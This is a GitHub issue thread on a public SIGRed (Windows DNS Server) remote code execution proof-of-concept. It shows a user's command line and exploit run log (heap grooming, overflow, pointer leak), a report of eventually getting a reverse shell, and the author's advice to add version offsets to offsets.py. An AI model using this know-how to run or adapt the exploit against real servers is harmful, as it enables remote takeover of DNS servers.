chompie1337 / SIGRed_RCE_PoC


Could not find dns offsets #16

Open Kedar59 opened 4 months ago

Kedar59 commented 4 months ago

I am trying the exploit with conditional forwarding. Output after running exploit.py:

```
$ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
[+] controllable heap addr: 0x28acd3567d0
[!] waiting for timeout object allocation
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering dns!RR_Free addr leak
[-] Could not find dns offsets!
```

DNS leak 64 file: dnsleak64

Windows version screenshot: windows server version

Kedar59 commented 4 months ago

So I ran the exploit a few more times and each time it gives a different error and it seems random for some reason. But eventually it worked in one of my attempts and I got the reverse shell.

chompie1337 commented 4 months ago

Please see the supported versions section of the readme:

https://github.com/chompie1337/SIGRed_RCE_PoC?tab=readme-ov-file#supported-versions

You will have to add the offsets for the version you are targeting to offsets.py. At the time of this exploit I did not have access to every single vulnerable version of dns.exe and msvcrt.dll.
